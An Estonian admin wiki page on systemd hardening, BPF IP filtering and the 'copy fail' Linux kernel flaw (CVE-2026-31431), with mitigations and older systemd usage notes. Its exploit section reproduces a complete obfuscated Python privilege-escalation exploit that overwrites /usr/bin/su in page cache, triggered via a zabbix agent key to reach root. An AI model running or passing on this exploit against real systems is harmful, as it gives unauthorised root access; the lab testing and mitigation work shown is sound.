✗ CapabilityBoundingSet=~CAP_SYS_PACCT Service may use acct() 0.1
✗ CapabilityBoundingSet=~CAP_KILL Service may send UNIX signals to arbitrary processes 0.1
✗ ProtectKernelLogs= Service may read from or write to the kernel log ring buffer 0.2
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM Service may program timers that wake up the system 0.1
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER) Service may override UNIX file/IPC permission checks 0.2
✗ ProtectControlGroups= Service may modify the control group file system 0.2
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE Service may mark files immutable 0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK Service may lock memory into RAM 0.1
✗ ProtectKernelModules= Service may load or read kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE Service may load kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_BPF Service may load BPF programs 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG Service may issue vhangup() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT Service may issue reboot() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT Service may issue chroot() 0.1
✗ PrivateMounts= Service may install system mounts 0.2
✗ SystemCallArchitectures= Service may execute system calls with all ABIs 0.2
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND Service may establish wake locks 0.1
✗ MemoryDenyWriteExecute= Service may create writable executable memory mappings 0.1
✗ RestrictNamespaces=~user Service may create user namespaces 0.3
✗ RestrictNamespaces=~pid Service may create process namespaces 0.1
✗ RestrictNamespaces=~net Service may create network namespaces 0.1
✗ RestrictNamespaces=~uts Service may create hostname namespaces 0.1
✗ RestrictNamespaces=~mnt Service may create file system namespaces 0.1
✗ CapabilityBoundingSet=~CAP_LEASE Service may create file leases 0.1
✗ CapabilityBoundingSet=~CAP_MKNOD Service may create device nodes 0.1
✗ RestrictNamespaces=~cgroup Service may create cgroup namespaces 0.1
✗ RestrictSUIDSGID= Service may create SUID/SGID files 0.2
✗ RestrictNamespaces=~ipc Service may create IPC namespaces 0.1
✗ ProtectHostname= Service may change system host/domainname 0.1
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP) Service may change file ownership/access mode/capabilities unrestricted 0.2
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP) Service may change UID/GID identities/capabilities 0.3
✗ LockPersonality= Service may change ABI personality 0.1
✗ ProtectKernelTunables= Service may alter kernel tunables 0.2
✗ RestrictAddressFamilies=~AF_PACKET Service may allocate packet sockets 0.2
✗ RestrictAddressFamilies=~AF_NETLINK Service may allocate netlink sockets 0.1
✗ RestrictAddressFamilies=~AF_UNIX Service may allocate local sockets 0.1
✗ RestrictAddressFamilies=~… Service may allocate exotic sockets 0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6) Service may allocate Internet sockets 0.3
✗ CapabilityBoundingSet=~CAP_MAC_* Service may adjust SMACK MAC 0.1
✗ RestrictRealtime= Service may acquire realtime scheduling 0.1
✗ Delegate= Service maintains its own delegated control group subtree 0.1
✗ CapabilityBoundingSet=~CAP_SYS_RAWIO Service has raw I/O access 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE Service has ptrace() debugging abilities 0.3
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE) Service has privileges to change resource use parameters 0.1
✗ DeviceAllow= Service has no device ACL 0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN Service has network configuration privileges 0.2
✗ ProtectProc= Service has full access to process tree (/proc hidepid=) 0.2
✗ ProcSubset= Service has full access to non-process /proc files (/proc subset=) 0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges 0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_* Service has audit subsystem access 0.1
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN Service has administrator privileges 0.3
✗ PrivateNetwork= Service has access to the host's network 0.5
✗ PrivateUsers= Service has access to other users 0.2
✗ CapabilityBoundingSet=~CAP_SYSLOG Service has access to kernel logging 0.1
✗ SystemCallFilter=~@clock Service does not filter system calls 0.2
✗ SystemCallFilter=~@cpu-emulation Service does not filter system calls 0.1
✗ SystemCallFilter=~@debug Service does not filter system calls 0.2
✗ SystemCallFilter=~@module Service does not filter system calls 0.2
✗ SystemCallFilter=~@mount Service does not filter system calls 0.2
✗ SystemCallFilter=~@obsolete Service does not filter system calls 0.1
✗ SystemCallFilter=~@privileged Service does not filter system calls 0.2
✗ SystemCallFilter=~@raw-io Service does not filter system calls 0.2
✗ SystemCallFilter=~@reboot Service does not filter system calls 0.2
✗ SystemCallFilter=~@resources Service does not filter system calls 0.2
✗ SystemCallFilter=~@swap Service does not filter system calls 0.2
✗ IPAddressDeny= Service does not define an IP address allow list 0.2
✗ NotifyAccess= Service child processes may alter service state 0.2
✗ UMask= Files created by service are world-readable by default 0.1

→ Overall exposure level for nginx-07.service: 9.9 UNSAFE 😨
kasutaja@ph-minio-01:~$
</pre>

===bpf integratsioon===

Väited

* nö uuemal ajal on systemd ja bpf integreeritud, nt võrgu paketifiltri osas
* bpf integratsioon on seotud cgroup nähtusega, st kitsenduste tegemisel saab kaustada info võrguaadresside, systemd objektide (slice, service) jms kohta (selles mõttes paindlikum kui niisama iptables/nft kuigi ka seal on iseenesest kasutajaga seostamine olemas)
* bpf ei ole stateful tulemüür, st bpf on stateless (conntrack jms puudub)
* bpf palju suurema jõudlusega kui tava-paketifilter

====Service====

Tavalisse service unitisse lisada Service sektsiooni 'IPAddressAllow' ja 'IPAddressDeny' direktiive, nt (see on küll podmaniga seotud service generated variant)

<pre>
root@ph-minio-01:~# cat .config/containers/systemd/nginx-06.container
[Unit]
Description=My Nginx Quadlet Service - 06
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/library/nginx:alpine
PublishPort=8096:80
ContainerName=nginx-06

[Service]
# Block all IP traffic by default
IPAddressDeny=any
# Then explicitly allow only what you need (e.g., your local subnet)
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.1
IPAddressAllow=8.8.8.8

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

kus

* ipaddressallow ja deny väärtusi võrreldakse ip pakettide src ja destination aadressidega st piisab kui üks neist klapib

Kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl --user daemon-reload
root@ph-minio-01:~# systemctl --user stop nginx-06
root@ph-minio-01:~# systemctl --user start nginx-06
</pre>

Tulemuse uurimine, väätus id 185 on dünaamiline, õige saab ära vaadata 'bpftool prog show' väljundist

<pre>
root@ph-minio-01:~# bpftool prog show id 185
185: cgroup_skb name sd_fw_egress tag df35b3b526089f21 gpl run_time_ns 1378480 run_cnt 1215
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51

root@ph-minio-01:~# bpftool prog show id 186
186: cgroup_skb name sd_fw_ingress tag 208d1bf35e7113d2 gpl run_time_ns 516780 run_cnt 1204
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51
</pre>

kus

* run_cnt näitab kui mitmel korral on kitsendust rakendatud

ning

<pre>
root@ph-minio-01:~# bpftool map show id 51
51: lpm_trie name 4_nginx_06.serv flags 0x1
key 8B value 8B max_entries 3 memlock 156B
</pre>

ning

<pre>
root@ph-minio-01:~# bpftool map dump id 51
key: 20 00 00 00 08 08 08 08 value: 01 00 00 00 00 00 00 00
key: 20 00 00 00 7f 00 00 01 value: 01 00 00 00 00 00 00 00
key: 18 00 00 00 c0 a8 0a 00 value: 01 00 00 00 00 00 00 00
Found 3 elements
</pre>

sellise skriptiga saab teisendada loetavamaks

<pre>
root@ph-minio-01:~# cat bpftool-map-dump.sh
#!/bin/bash

bpftool map dump id 51 | grep '^key' | while read -r line; do
bytes=($(echo $line | cut -d: -f2))
printf "Prefix: %d | IP: %d.%d.%d.%d\n" "$((16#${bytes[0]}))" "$((16#${bytes[4]}))" "$((16#${bytes[5]}))" "$((16#${bytes[6]}))" "$((16#${bytes[7]}))"
done

root@ph-minio-01:~# ./bpftool-map-dump.sh
Prefix: 32 | IP: 8.8.8.8
Prefix: 32 | IP: 127.0.0.1
Prefix: 24 | IP: 192.168.10.0
</pre>

Tulemusena ei saa konkteinerist välja võrku mujale pöörduda.

====Slice====

<pre>
root@ph-minio-01:~# systemctl edit user.slice

root@ph-minio-01:~# cat /etc/systemd/system/user.slice.d/override.conf
[Slice]
# This is a slice, but we can still pass BPF instructions
IPAddressDeny=any
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.0/8
</pre>

kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl daemon-reload
</pre>

logida välja ja sisse ssh pealt näiteks ning

<pre>
root@ph-minio-01:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
^C
--- 8.8.8.8 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1005ms

root@ph-minio-01:~#
</pre>

====Misc====

bpftop esitab ülevaatlikult

[[Fail:20260420-systemd-bpf-01.png|800px]]

===20260501 - copy fail eksploit===

Väited

* küllap kõik see lugu on ajutise iseloomuga praktiliselt, st varsti saabub uus parandatud linux kernel
* pedagoogilises mõttes on see huvitav lugu
* vahetulemusi on huvitav pasteda chatgpt'le ja küsida selgitusi

====Tööpõhimõte - af_alg====

af_alg on omaette 'address family' nagu af_unix (nn unix soket), af_inet (tavaline internet), af_netlink, af_xdp jt. Tema kaudu saab eksootilisem tarkvara kasutada riistvara lähedast krüptimist, nt (kcapi - kernel crypto api)

<pre>
root@pwrk-02:/home/imre/20260430# apt-get install kcapi-tools

imre@pwrk-02:/home/imre/20260430$ date > cleartext.txt

imre@pwrk-02:/home/imre/20260430$ kcapi-enc -e -c "cbc(aes)" --passwd "MyPassword123" --iv $(openssl rand -hex 12) < cleartext.txt > encrypted.bin
kcapi-enc - Warning: Password on command line is visible in process listing and /proc! Use --passwd_fd command line option!
kcapi-enc - Warning: PBKDF2 iterations used: 131072
kcapi-enc - Warning: PBKDF2 salt used: 245b53106bb1d0cf09700fd63161dd0b59601995e368d6410d6e59adbd7e8468
</pre>

kus

* valitud krüpto 'cbc(aes)' asemel saab olla ka muud, nad kõik toimetavad af_alg soketi kaudu, aga edasi kasutavad erinevaid oskusi, nendega on seotud erinevad täiendavad kerneli moodulid - eksploitimisega on seotud konkreetselt üks - algif_aead

<pre>
imre@pwrk-02:~$ lsmod | grep alg
algif_hash 12288 0
algif_rng 12288 0
algif_skcipher 12288 0
algif_aead 12288 0
af_alg 32768 4 algif_hash,algif_skcipher,algif_aead,algif_rng
</pre>

Nn af_alg funktsionaalsuse kasutamine toimub user-space pealt ja teenindamine toimub kernel-space peal, ja nagu tavaliselt seda nö horisonti ületatakse syscall tehnika abil. syscall'il on tohtu vastutus oma sisendi kontrollimise ja oma tegevuste osas - privilegeerimata actor palub midagi korda saata väga privilegeeritud actoril; mingis mõttes on ta nagu setuid bit või sudo-abil-root-minemine.

====Tööpõhimõte - eksploit====

copy fail eksploit kasutab ära af_alg osakonnas kerneli ümbruses toimuvaid võimalusi, privilegeerimata kaustajal on võimalik kirjutada page cache sisu mingis ulatuses üle. Nt selliselt

* esmalt korraldatakse page cache peale mõni setuid bit sisselülitusega fail, nt 'su' - nt lugedes faili tavalisel viisil satub tema sisu page cache'i
* siis muudetakse sisu sobivalt page cache osakonnas (st arvuti mälus) - see on võimalik tänu eksploidi toimimisele - üldiselt on linux kerneli lubadus selline, et kui protsess (privilegeerimata protsess antud juhul) ei saa failisüsteemis faili muuta, siis ei saa ta tegeleda ka cache'itud vastava faili sisuga)
* käivitatakse muudetud failile vastav programm, kuna fail on juba page cache peal, siis failisüsteemist seda uuesti ei loeta - setuid bit kätega minnakse root shelli
* teoreetiliselt võiks olla võimalik kas vastupidine, st mõnele pahale programmile vastavale failile pannakse külge setuid bit, aga antud juhul ei ole see kõneks - seda oleks ehk raskem teha st sobiv koht cache pealt üles otsida, ja see setuid bit on faili metaandmete koosseisu st asub inode cache peal mitte page cache, ja kõneksolev eksploit sinna ei saa sodima minna
* page cache on üldiselt seotud vfs (virtual filesystem) nähtusega, st sellega, mis on nö ext4 jt failisüsteemide kohal ja protsesside all

Asjaosalised kihid

<pre>
arvutis töötavad protsessid (arvuti mälu)

|
v

vfs (virtual file system) (arvuti mälu)

|
v

page cache (arvuti mälu)

|
v

ext4 filesystem (plokkseade)

|
v

plokkseade (füüsiline ese)
</pre>

kus

* page cache peale tehtud muudatuse saab unustada öeldes '# echo 3 > /proc/sys/vm/drop_caches'
* page cache peale tehtud muudatuse saab põlistada ext4 failisüsteemi öeldes 'sync'
* plokkseadme puhvrid saab madalamale kihile kirjutada põlistada blockdev käsu abil

Üldiselt on syscallidel tohutu vastutus oma sisendit valideerida ja jälgida mida nad edasi teevad, tundub, et antud juhul af_alg teemaga tegelevad syscall'id seda vastutust ei kanna välja st lasevad ennast manipuleerida.

====Tööpõhimõte - leevendus====

Kõige õigem oleks kernel tarkvara parandus ja küllap see varem või hiljem saabub. Seniks on võimalik rakendada ühte- ja teistsugust leevendust (mitigation)

* uskuda, et pahatahtlik kasutaja süsteemis ei tegutse programme kohale tuues ja neid kävitades (nö tavaline veebiserver pigem ei tohiks lubada ette anda koodi mida käivitatakse; tavaline veebiserver käivitab süsteemi haldajate poolt paigaldatud koodi)
* lülitada kerneli tasemal välja af_alg funktsionaalsus (modprobe) - mõju globaalne
* lülitada syscall tulemüüri tasemel välja af_alg funktsionaalsus (nn secure computing ehk seccomp, mis omakorda põhineb bpf tehnikal, vist nn 'Seccomp-BPF', mida ei haldab bpftool (bpftool tegeleb eBPF osakonnaga nähtustega) - mõju protsessile (ja tema järglastele, või systemd service unitiga seotud protsessidele)

Kerneli tasemel välja lülitamine eeldab praktiliselt, et af_alg funktsionaalsus on realiseeritud tuuma moodulite abil (ei ole otse nn /boot/vmlinuz kerneli sisse kompileeritud). Tavaliselt on modulaarne. Mõju on globaalne.

syscall tulemüüri tasemel välja lülitamine on paindlik - saab (peab st muul viisil ei saagi praktiliselt st globaalselt ei saa (kuigi teoreetiliselt saaks init=pid=1 protsessile ka seccomp abil kitsendusi rakendada, aga tavaliselt nii ei tehta) erinevate protsesside (protsesside komplektide) jaoks muudatust kehtestada. Seejuures saab määrata, mis keeldu ületada püüdva protsessiga edasi juhtub: 1. ta töötab edasi, 2. ta töötamine lõpetatakse

====Eksploit näide====

https://copy.fail/ - tõenäoliselt on see nö puhas eksploit, st midagi suurelt temaga katsetamine ussitama ei aja st vaevalt ta interneti isandale sama arvuti /root/.ssh sisu saadab, aga kuna ta page cache sobib ja vaevalt, et seda exploiti on liiga palju testitud ja arendatud, siis ei ole võimatu ext4 failisüsteemi riknemine, arvutis töötavate protsesside segadusse sattumine kuni os krahhini; st proovida ehk maksab, aga arvutis, mis pärast kustutatakse

<pre>
$ cat /home/tmp/cf.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

$ chmod 0755 /home/tmp/cf.py
</pre>

zabbix agent kaudu

<pre>
root@pwrk-02:~# cat /etc/zabbix/zabbix_agent2.d/misc.conf
UserParameter=cf,echo id | /home/tmp/cf.py 1>>/home/tmp/cf.log 2>&1
</pre>

käivitamine

<pre>
root@pwrk-02:~# zabbix_get -k cf -s 127.0.0.1

root@pwrk-02:~#
</pre>

logi

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
..
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
...
</pre>

page cache puhastamine ("3" kasutamine nö puhastab kõik, inode cache, page cache jne, põhimõtteliselt sobiks ka "1")

<pre>
root@pwrk-02:~# echo 3 > /proc/sys/vm/drop_caches
</pre>

katsetamisel võib olla vajalik vahel jällegi moodulid välja lülitada, nt

<pre>
root@pwrk-02:~# rmmod algif_rng algif_aead algif_skcipher algif_hash af_alg
</pre>

====Leevendus - systemd service====

Väited

* mõju on service põhine
* praktiliselt võiks rakendada avalikku võrku publitseeritud teenuste (protsesside) jaoks mille kaudu võiks olla selline python skript laadse sisu käivitamine (mingit tüüpi exec syscall rakendamine) realistlik
* öeldakse, et kasutame systemd võimalusi, tehniliselt kasutatakse linux kerneli secure compute võimalusi (seccomp)
* kehtestamiseks tuleb systemd service stop ja start öelda

systemd service unit muudatus, enne (zabbix-agent protsessi pid on 174841)

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~

root@pwrk-02:/home/imre/20260430# cat /proc/174841/status | grep -i secco
Seccomp: 0
Seccomp_filters: 0
</pre>

muudatus

<pre>
# root@pwrk-02:~# systemctl edit zabbix-agent2
[Service]
RestrictAddressFamilies=~AF_ALG
# SystemCallErrorNumber=kill
# SystemCallErrorNumber=EPERM
</pre>

kus

* RestrictAddressFamilies=~AF_ALG konstruktsioon väljendab eitust st kõik protokollid on lubatud v.a. AF_ALG
* SystemCallErrorNumber kontrollib, mis rikkumist proovinud protsessiga edasi saab

peale muudatust

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~AF_ALG

root@pwrk-02:/home/imre/20260430# cat /proc/174842/status | grep -i secco
Seccomp: 2
Seccomp_filters: 2
</pre>

Eksploit kasutamine annab nüüd sellise tulemuse

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
...
Traceback (most recent call last):
File "/home/tmp/cf.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/home/tmp/cf.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
</pre>

====Leevendus - apparmor profile====

TODO

====Leevendus - modprobe====

Väited

* mõju on globaalne süsteemile - võib olla on see liiga suure mõjuga st arvuti juures midagi siiski vajab af_alg

<pre>
# cat /etc/modprobe.d/mitigate-copy-fail.conf
install algif_aead /bin/true
</pre>

kus

* 'install algif_aead' element ütleb, et kui toimub algif_aead mooduli laadimise attampt, siis hoopis täita järgnev käsk - '/bin/true' (mingi teooria kohaselt on /bin/true kasutamine sobivam kui /bin/false kuna vea saamisel võiks süsteem proovida veelkorra moodulit laadida jne)
* selle käsu andmisel tehniliselt ollakse õnnelik iseensest kuigi sisuliselt midagi ei muutu
* muudatus kehtestub koheselt

ning parem oleks ehk ka initramfs uuesti tekitada

<pre>
root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep alg
usr/lib/modules/6.8.0-110-generic/kernel/crypto/af_alg.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_aead.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_hash.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_rng.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_skcipher.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos/i2c-algo-bit.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/net/xfrm/xfrm_algo.ko.zst
</pre>

ja

<pre>
root@pwrk-02:~# update-initramfs -u
update-initramfs: Generating /boot/initrd.img-6.8.0-110-generic
I: The initramfs will attempt to resume from /dev/dm-2
I: (/dev/mapper/system-swap)
I: Set the RESUME variable to override this.

root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep 'etc/modprobe.d'
etc/modprobe.d
etc/modprobe.d/amd64-microcode-blacklist.conf
etc/modprobe.d/blacklist-ath_pci.conf
etc/modprobe.d/blacklist-firewire.conf
etc/modprobe.d/blacklist-framebuffer.conf
etc/modprobe.d/blacklist-rare-network.conf
etc/modprobe.d/blacklist.conf
etc/modprobe.d/dkms.conf
etc/modprobe.d/intel-microcode-blacklist.conf
etc/modprobe.d/iwlwifi.conf
etc/modprobe.d/mdadm.conf
etc/modprobe.d/mitigate-copy-fail.conf
root@pwrk-02:~#
</pre>

====Misc - docker rootful====

docker rootful puhul tuleb muuta kahte service'it - kuna child protsessid pärivad vanematelt seccomp jms omadused, siis mõju on tõhus

* docker
* containerd

====Debian====

20260501 ilmus Debian operatsioonisüsteemile parandatud tuum

[[Fail:20260502-debian-copy-fail-01.png|1000px]]

kus

* https://www.debian.org/security/
* https://security-tracker.debian.org/tracker/source-package/linux
* muudatusi saab otsida globaalse CVE nime abil (nt CVE-2026-31431)

====Ubuntu====

20260501 ilmus Ubuntu operatsioonisüsteemile parandatud kmod pakett

[[Fail:20260502-ubuntu-copy-fail-01.png|1000px]]

kus

* kmod paketis sisaldub fail etc/modprobe.d/disable-algif_aead.conf

<pre>
root@pwrk-02:~/20260502# cat etc/modprobe.d/disable-algif_aead.conf
# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
# This will likely be re-enabled in a subsequent update once an updated
# kernel has been deployed.
# Blacklisting the module isn't sufficient, we need to do as below:
install algif_aead /bin/false
</pre>

* küllap parandatud tuum ilmub seejärel

====Proxmox====

20260501 on ilmunud no-subscription repodesse v. 7 tuum, seda see 'copy fail' haavatavus ei puuduta

<pre>
root@pve-svc-02:~# uname -a
Linux pve-svc-02 7.0.0-3-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.0-3 (2026-04-21T22:56Z) x86_64 GNU/Linux
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-configure-systemd-service-hardening-on-ubuntu/view
* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* [[:Systemd-nspawn kasutamine operatsioonisüsteemiga Debian]]
* http://en.wikipedia.org/wiki/Systemd
* http://blog.exppad.com/article/a-docker-like-container-management-using-systemd
* http://0pointer.net/blog/projects/systemd-for-admins-1.html
* http://zero-knowledge.org/post/92
* http://0pointer.de/public/systemd-ebook-psankar.pdf
* http://ktaraghi.blogspot.com/2013/11/what-is-systemd-and-how-it-works-part-1.html

Systemd kasutamine

2026-05-02T10:06:27Z

Imre: /* Tööpõhimõte - eksploit */

===Sissejuhatus===

systemd http://freedesktop.org/wiki/Software/systemd/ ...

Tundub, et 2014 aasta lõpus on Debian v. 8 Jessie koosseisus vaikimisi systemd

# ls -ld /sbin/init
lrwxrwxrwx 1 root root 20 Sep 28 22:33 /sbin/init -> /lib/systemd/systemd

===Tööpõhimõte===

* Turvalisus ja tegevuste isoleerimine failisüsteemi ja võrgu tasemel, http://0pointer.de/blog/projects/security.html
* SysV käivitusskripti on imperatiivsed, st shell skriptid praktiliselt, systemd nö käivitusskriptid on deklaratiivsed, st nn .ini failidele sarnase sisuga

===Paigaldamine===

Tundub, et minimaalsele keskkonnale (nt debootstrap abil moodustatud) tuleb juurde lisada dbus ja polkit tugi, vastasel korral nt systemd-cgls programm ei tööta)

# apt-get install dbus libpolkit-agent-1-0

===Kasutamine===

Teenuse oleku küsimiseks sobib öelda

# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
Active: active (running) since Tue 2014-11-04 02:43:10 EET; 18h ago
Main PID: 1956 (sshd)
CGroup: /system.slice/ssh.service
└─1956 /usr/sbin/sshd -D

kus

# cat /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure

[Install]
WantedBy=multi-user.target
Alias=sshd.service

Teenuste nimekirja esitamiseks

# systemctl list-units --type=service | head -n 5
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active exited LSB: Start the Advanced Configuration and Power Interface daemon
amavis-mc.service loaded active exited LSB: Startup script for amavis master supervisor
amavis.service loaded active running LSB: Starts amavisd-new mailfilter

Tundub, et teenus saab olla mitmes olekus, üks variant teenuseid on sellised, mis arvuti käivitamisel nö korraks töötavad midagi sisse lülitades ja siis teevad exit, nt

# systemctl list-units --type=service --state=exited
UNIT LOAD ACTIVE SUB DESCRIPTION
getty-static.service loaded active exited getty on tty2-tty6 if dbus and logind are not available
kbd.service loaded active exited LSB: Prepare console
keymap.service loaded active exited LSB: Set keymap
modules_dep.service loaded active exited LSB: modules.dep creation.
netfilter-persistent.service loaded active exited netfilter persistent configuration
networking.service loaded active exited LSB: Raise network interfaces.
quota.service loaded active exited Check And Enable File System Quotas
rc-local.service loaded active exited /etc/rc.local Compatibility
systemd-random-seed.service loaded active exited Load/Save Random Seed

===systemd-timedated===

timedatectl programmiga saab seadistada ajavööndit jms

# timedatectl list-timezones
# timedatectl set-timezone Europe/Tallinn

systemd-timedated on ntp klient, mis tuleb kasutamiseks sisse lülitada

# timedatectl set-ntp true

Tundub, et samaväärne on öelda

# systemctl enable systemd-timesyncd
# systemctl start systemd-timesyncd

Töötamissel annab timedatactl saranase vastuse

# timedatectl status
Local time: Fri 2015-07-31 01:21:26 EEST
Universal time: Thu 2015-07-30 22:21:26 UTC
RTC time: Thu 2015-07-30 22:21:26
Time zone: Europe/Tallinn (EEST, +0300)
NTP enabled: yes
NTP synchronized: no
RTC in local TZ: no
DST active: yes
Last DST change: DST began at
Sun 2015-03-29 02:59:59 EET
Sun 2015-03-29 04:00:00 EEST
Next DST change: DST ends (the clock jumps one hour backwards) at
Sun 2015-10-25 03:59:59 EEST
Sun 2015-10-25 03:00:00 EET

kus

* valitud ajavööndi Daylight Saving Time algus ja lõpp
* kas NTP teenust töötab (systemd-timesyncd)

Spetsiifilise NTP serveri kasutamiseks sobib näidata ta seadistusfailis /etc/systemd/timesyncd.conf

# cat /etc/systemd/timesyncd.conf
[Time]
Servers=10.192.0.53

ja muudatuse kehtestamiseks öelda

# systemctl restart systemd-timesyncd

Tulemusena

# systemctl status systemd-timesyncd
● systemd-timesyncd.service - Network Time Synchronization
Loaded: loaded (/lib/systemd/system/systemd-timesyncd.service; enabled)
Active: active (running) since Fri 2015-07-31 09:13:18 EEST; 1min 43s ago
Docs: man:systemd-timesyncd.service(8)
Main PID: 1179 (systemd-timesyn)
Status: "Using Time Server 10.192.0.53:123 (10.192.0.53)."
CGroup: /system.slice/systemd-timesyncd.service
└─1179 /lib/systemd/systemd-timesyncd

Jul 31 09:13:17 postkast systemd-timesyncd[1179]: Using NTP server 10.192.0.53:123 (10.192.0.53).
Jul 31 09:13:18 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 32s/+0.621s/0.000s/0.000s/+0ppm
Jul 31 09:13:50 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 64s/+0.000s/0.000s/0.000s/+0ppm
Jul 31 09:14:54 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 128s/-0.000s/0.000s/0.000s/+0ppm

Taustal tegutseb lisaks systemd-timedated deemon, mis on static, st teda kutsutakse automaatselt vajadusel välja, st käivitatakse

# systemctl status systemd-timedated
● systemd-timedated.service - Time & Date Service
Loaded: loaded (/lib/systemd/system/systemd-timedated.service; static)
Active: inactive (dead)
Docs: man:systemd-timedated.service(8)
man:localtime(5)
http://www.freedesktop.org/wiki/Software/systemd/timedated

===Rakenduste kasutamine systemd keskkonnas===

====PostgreSQL kasutamine====

Mitme PostgreSQL protsesside komplekti kasutamiseks sobib esmalt järgmise eksemplari osa failisüsteemis ettevalmistada nö tavalisel viisil

# pg_createcluster 9.4 test

ning käivitada

# systemctl start postgresql@9.4-test

Mitme PostgreSQL protsesside komplekti kasutamine paistab sedasi

# ps -U postgres -o pid,user,cgroup:150,args
PID USER CGROUP COMMAND
10064 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service /usr/lib/postgresql/9.4/bin/postgres -D /va ...
10070 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: checkpointer process
10072 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: writer process
